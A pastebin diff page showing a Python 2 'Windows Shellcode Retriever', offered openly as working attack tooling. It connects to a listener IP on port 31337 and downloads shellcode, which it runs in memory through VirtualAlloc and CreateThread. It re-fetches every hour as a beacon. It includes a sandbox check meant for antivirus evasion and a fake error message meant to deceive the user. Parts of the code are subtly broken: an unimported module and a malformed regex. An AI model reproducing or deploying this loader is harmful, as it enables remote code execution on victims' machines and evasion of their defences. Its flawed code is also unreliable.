View difference between Paste ID: <a href="/mic8SdLE">mic8SdLE</a> and <a href="/Uj5HKR1A">Uj5HKR1A</a>

#!/usr/bin/env python
1		#!/usr/bin/env python
2		#
3		# Windows Shellcode Retriever
4		# By: HR
5		#
6		# It's just a slightly modified version of Joshua Pitts' Shellcode Retriever Script...
7		# Use Shellcode Sender on the other end to serve up your payloads for execution
8		#
9
10		import ctypes, os, signal, socket, sys, time
11
12		TARGET='192.168.1.4' # Shellcode Sender Listener IP
13		PORT=31337 # Shellcode Sender Listener Port
14		BEACON=True # Repeat Shellcode Retrival
15		BEACON_DELAY=3600 # 1 hour delay between retrieval attempts
16
17
18		def system_info():
19		"""
20		Check System Info and Returns Info in Dictionary Array
21		{
22		'Available Physical Memory': '644 MB',
23		'Product ID': '00426-OEM-8992662-00006',
24		'OS Name': 'Microsoft Windows 7 Ultimate',
25		'BIOS Version': 'Phoenix Technologies LTD 6.00, 7/2/2012',
26		'System Model': 'VMware Virtual Platform',
27		'System type': 'X86-based PC',
28		'Total Physical Memory': '1,023 MB',
29		'Logon Server': '\\\\WIN-6CQ3JVLCHM4',
30		'Domain': 'WORKGROUP',
31		'Windows Directory': 'C:\\Windows',
32		'OS Version': '6.1.7601 Service Pack 1 Build 7601',
33		'System Manufacturer': 'VMware, Inc.',
34		'Host Name': 'WIN-6CQ3JVLCHM4'
35		}
36
37		Example:
38		>>> info = SysInfo()
39		>>> info['OS Version']
40		'6.1.7601 Service Pack 1 Build 7601'
41
42		Borrowed from our sacred stackoverflow:
43		http://stackoverflow.com/questions/467602/how-can-i-read-system-information-in-python-on-windows
44		"""
45		values = {}
46		cache = os.popen2("SYSTEMINFO")
47		source = cache[1].read()
48		sysOpts = ["Host Name", "OS Name", "OS Version", "Product ID", "System Manufacturer", "System Model", "System type", "BIOS Version", "Domain", "Windows Directory", "Total Physical Memory", "Available Physical Memory", "Logon Server"]
49		for opt in sysOpts:
50		values[opt] = [item.strip() for item in re.findall("%s:\w(.?)\n" % (opt), source, re.IGNORECASE)][0]
51		return values
52
53
54		def decoy_message():
55		""" Decoy Message to Present to User on Epic Failure """
56		info = system_info()
57		print "\n[x] Unsupported Windows Version!"
58		print " [*] Platform: %s" % sys.platform
59		print " [x] Build Version: %s" % info['OS Version']
60		print "\n[*] Keep Checking Developer Site for updates...\n\n"
61		sys.exit(0)
62
63
64		def sandbox_check():
65		"""
66		Quick sandbox check for additional av evasion.
67		And a message to throw the user off.
68		"""
69		##################################################################################
70		# Add some mathematical stuff or some time consuming activities for added delays #
71		##################################################################################
72		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
73		sandbox = True
74		try:
75		s.connect(('127.0.0.1', 445))
76		s.close()
77		sandbox = False
78		except:
79		pass
80		if sandbox == True:
81		try:
82		s.connect(('127.0.0.1', 135))
83		s.close()
84		except:
85		# Mission Abort!
86		decoy_message()
87
88
89		def run_shellcode(shellcode):
90		"""
91		ctypes VritualAlloc, MoveMem, and CreateThread
92		From http://www.debasish.in/2012_04_01_archive.html
93		"""
94		# Get pointer to our allocated memory space
95		pointer = ctypes.windll.kernel32.VirtualAlloc(
96		ctypes.c_int(0),
97		ctypes.c_int(len(shellcode)),
98		ctypes.c_int(0x3000),
99		ctypes.c_int(0x40)
100		)
101
102		# Move Shellcode into memory
103		buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
104		ctypes.windll.kernel32.RtlMoveMemory(
105		ctypes.c_int(pointer),
106		buf,
107		ctypes.c_int(len(shellcode))
108		)
109
110		# Create new thread and run our shellcode in it
111		thread_handle = ctypes.windll.kernel32.CreateThread(
112		ctypes.c_int(0),
113		ctypes.c_int(0),
114		ctypes.c_int(pointer),
115		ctypes.c_int(0),
116		ctypes.c_int(0),
117		ctypes.pointer(ctypes.c_int(0))
118		)
119
120		# Wait for our thread to finish or timeout
121		ctypes.windll.kernel32.WaitForSingleObject(
122		ctypes.c_int(thread_handle),
123		ctypes.c_int(-1)
124		)
125		return
126
127
128
129		def fetch_shellcode(target, port):
130		"""
131		Raw TCP Socket Request to Target:Port to grab our remote shellcode
132		The received Shellcode is then passed off to be run
133		"""
134		# Open TCP Socket Connection to target:port
135		print '[*] Downloading Shellcode...'
136		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
137		s.connect((target,port))
138
139		# Receive shellcode
140		data = s.recv(1024)
141		shellcode = data
142		while data != '':
143		data = s.recv(1024)
144		if data == '':
145		break
146		else:
147		shellcode += data
148
149		# Convert to Bytearray for usability sake
150		shellcode = bytearray(shellcode)
151
152		# Pass to be run in memory...
153		print '[*] Executing Shellcode in Memory....'
154		run_shellcode(shellcode)
155
156
157
158		def main():
159		# Does making connetions raise alerts?
160		sandbox_check()
161
162		if TARGET == '':
163		decoy_message() # If you cant read and edit source, you fail
164		# TARGET = raw_input("Enter Shellcode Listner IP: ")
165		# PORT = raw_input("Enter Shellcode Listner Port: ")
166		try:
167		fetch_shellcode(TARGET, int(PORT))
168		while BEACON is True:
169		# print '[*] Sleeping for %d seconds....' % BEACON_DELAY
170		time.sleep(BEACON_DELAY)
171		fetch_shellcode(TARGET, int(PORT))
172
173		except Exception, e:
174		# print str(e)
175		pass
176
177		if __name__ == "__main__":
178		main()